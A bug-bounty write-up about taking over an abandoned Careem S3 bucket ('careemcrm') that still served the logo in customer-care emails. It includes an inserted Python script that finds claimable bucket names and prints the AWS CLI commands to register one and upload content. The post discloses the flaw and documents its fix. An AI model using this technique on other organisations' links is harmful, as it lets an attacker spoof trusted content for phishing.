This story happened last year, and I think it makes a good case study of taking advantage of broken links. It also contains a funny story that shows I run into security issues wherever I go :D
Last year, I travelled to Dubai to explore the place and to meet some good friends: Yasser, Ahmed, and Ayoub.
I am a loyal Careem user; I use it most of the time wherever I travel, and also while I am in Iraq. When it was time to travel back home, I ordered a taxi via the Careem application. I waited, and the driver was somewhere nearby my hotel. I took my bag out and waited for him on the sidewalk, hoping he would see me, since it was morning and nobody else was out there. He saw me but never moved; I was waving at him when he left, cancelled the ride, and wrote that I didn't show up.
Frustrated, I ordered a new one, since I had to get to the airport as soon as possible; the driver was nearby, so it didn't take long. However, I found that the Careem app had already charged a fee for the ride I didn't take!
When I got home, I filed a complaint about the trip. They called me, I explained what had happened, and they apologised and refunded the ride fee. Heeey.
After a while, I received an email from their Customer Care team asking whether I was satisfied with my last interaction with them. There was a broken image link in the email, and I was perplexed that they hadn't noticed it.
I used the browser's inspect element tool to take a look at the broken link. The element was:
<img alt="Careem" title="Careem" src="https://ci5.googleusercontent.com/proxy/VFkr93bHbGyGsKAShSjEy1Wa5c2_E1roaPHqkXAgvfFVAe-4cPZ59CKXCpY-vig5E96sY7ojsvKFiy8uAkfA564sndlRHO01J_LqgsbCJyyzudeSS78=s0-d-e1-ft#https://s3.amazonaws.com/careemcrm/promotional/careem_logo_Care.png" class="CToWUd">
Since I was using Gmail, which proxies remote images through its own server instead of loading them directly, the real link to the image is the part after the hash (#) in that URL: https://s3.amazonaws.com/careemcrm/promotional/careem_logo_Care.png
So, it is an S3 bucket. At first I thought careem_logo_Care.png had simply been deleted and that this caused the error, but when I visited the bucket link itself, it returned the following response:
As you can see, the response says <Code>NoSuchBucket</Code>, which in the security world means the bucket can be taken over: S3 bucket names are global and first come, first served, so anyone can create a bucket with that name and serve content at every URL that still points at it. That is what happened here. I used the AWS CLI with my own AWS account to create a bucket with that name, then copied a file from my PC into the S3 bucket.
And here is our PoC:
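The steps above (unwrap the Gmail proxy URL, read the bucket name out of the S3 URL, look at the error code S3 returns, then claim the name with the AWS CLI) as a small script. This is an added example written for this post, not the author's or Careem's code. The image URL is the one from the email above; the two XML error bodies are constructed to match the S3 error format (the post itself only shows the <Code> element); probe_bucket() is the only function that touches the network, and takeover_commands() just returns the `aws s3 mb` / `aws s3 cp` commands the post describes rather than running them.

```python
import re
import urllib.error
import urllib.request
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Hosts S3 serves content from, in both URL styles:
#   path-style:           s3.amazonaws.com/<bucket>/key, s3-eu-west-1.amazonaws.com/<bucket>/key
#   virtual-hosted-style: <bucket>.s3.amazonaws.com/key, <bucket>.s3.eu-west-1.amazonaws.com/key
S3_HOST_RE = re.compile(r"^(?:(?P<bucket>.+?)\.)?s3(?:[.-][a-z0-9-]+)?\.amazonaws\.com$")

# The <img src> from the Customer Care email, Gmail proxy wrapper included.
EMAIL_IMG_SRC = (
    "https://ci5.googleusercontent.com/proxy/VFkr93bHbGyGsKAShSjEy1Wa5c2_E1roaPHqkXAgvfFVAe-4cPZ59CKXCpY-"
    "vig5E96sY7ojsvKFiy8uAkfA564sndlRHO01J_LqgsbCJyyzudeSS78=s0-d-e1-ft"
    "#https://s3.amazonaws.com/careemcrm/promotional/careem_logo_Care.png"
)

# Constructed S3 error bodies (documented format; not copied from the post).
NO_SUCH_BUCKET_XML = (
    "<?xml version='1.0' encoding='UTF-8'?><Error><Code>NoSuchBucket</Code>"
    "<Message>The specified bucket does not exist</Message>"
    "<BucketName>careemcrm</BucketName></Error>"
)
ACCESS_DENIED_XML = "<Error><Code>AccessDenied</Code><Message>Access Denied</Message></Error>"


def unwrap_gmail_proxy(url: str) -> str:
    """Gmail rewrites remote images through ci*.googleusercontent.com/proxy/...
    and keeps the original URL after '#'. Return that original, else the URL unchanged."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    if host.endswith(".googleusercontent.com") and parts.fragment.startswith("http"):
        return parts.fragment
    return url


def s3_bucket_from_url(url: str):
    """Return the bucket name an S3 URL refers to, or None if the host is not S3."""
    parts = urlsplit(url)
    m = S3_HOST_RE.match(parts.hostname or "")
    if not m:
        return None
    if m.group("bucket"):                      # virtual-hosted style: bucket is in the host
        return m.group("bucket")
    segments = [s for s in parts.path.split("/") if s]
    return segments[0] if segments else None   # path style: bucket is the first path segment


def classify_s3_response(status: int, body: str) -> str:
    """Classify a GET on the bucket root. 'claimable' means S3 answered NoSuchBucket:
    the name is free, so anyone can create it and serve every link that still uses it."""
    if status == 200:
        return "exists (listing is public)"
    try:
        code = ET.fromstring(body).findtext("Code") or ""
    except ET.ParseError:                      # not an S3 XML error (e.g. an HTML page)
        code = ""
    if code == "NoSuchBucket":
        return "claimable"
    if code in ("AccessDenied", "AllAccessDisabled", "PermanentRedirect", "NoSuchKey"):
        return "exists (" + code + ")"
    return "unknown (HTTP %d, code %r)" % (status, code)


def probe_bucket(bucket: str, timeout: float = 10.0) -> str:
    """Live check (network): fetch the bucket root and classify the answer.
    Only run this against names you are authorised to test."""
    req = urllib.request.Request("https://s3.amazonaws.com/" + bucket + "/",
                                 headers={"User-Agent": "bucket-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify_s3_response(resp.status, resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as err:     # 403/404 carry the XML error body we need
        return classify_s3_response(err.code, err.read().decode("utf-8", "replace"))


def takeover_commands(bucket: str, key: str, region: str = "us-east-1"):
    """The AWS CLI steps from the post: create the free bucket name in your own
    account, then upload a file at the key the dangling link expects."""
    return [
        "aws s3 mb s3://%s --region %s" % (bucket, region),
        "aws s3 cp poc.png s3://%s/%s" % (bucket, key),
    ]


if __name__ == "__main__":
    real = unwrap_gmail_proxy(EMAIL_IMG_SRC)
    bucket = s3_bucket_from_url(real)
    print("real URL:", real)
    print("bucket  :", bucket)
    print("offline :", classify_s3_response(404, NO_SUCH_BUCKET_XML))
    for cmd in takeover_commands(bucket, "promotional/careem_logo_Care.png"):
        print("  $", cmd)
    # print("live    :", probe_bucket(bucket))  # uncomment for a real check
```

The offline classifier is the useful part for triage: a 403 AccessDenied means the bucket exists and belongs to someone, while a 404 NoSuchBucket is the signal that the name is up for grabs, which is exactly the difference between "the image was deleted" and "the whole bucket is gone".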
I tried to find where I could report this issue, but to no avail: Careem has no bug bounty program, so I was a little disappointed that such a reputable company has no BBP.
I contacted a friend who works in Careem's Iraq office, and he forwarded me to the security team, who fixed the issue. I told them I would delete the S3 bucket from my account so they could take it back, but they said they didn't want it anymore.
They emailed to inform me that they had fixed the issue and that the root cause was:
Based on your initial description and proof-of-concept, this appears to be an abandoned S3 bucket which may belong to someone who used to work with the company, and as a direct result of this no one handed over all the info.
In summary, I was able to hijack the Customer Care email banner and display any image I wanted. Furthermore, I wasn't sure what other links pointed to this bucket, so other interesting places may have been using it as well.
For Bug Bounty Hunters & Security Engineers
Importantly, keep an eye on broken links, and on links in emails, PDFs, or pages for old events.
URL Tracker Project!
I created a side project that may help keep track of all the cloud services and links that could open the door to takeover issues. The project is still in progress; you can follow it here.
If you think your site/app/network are secure and want to make sure about that then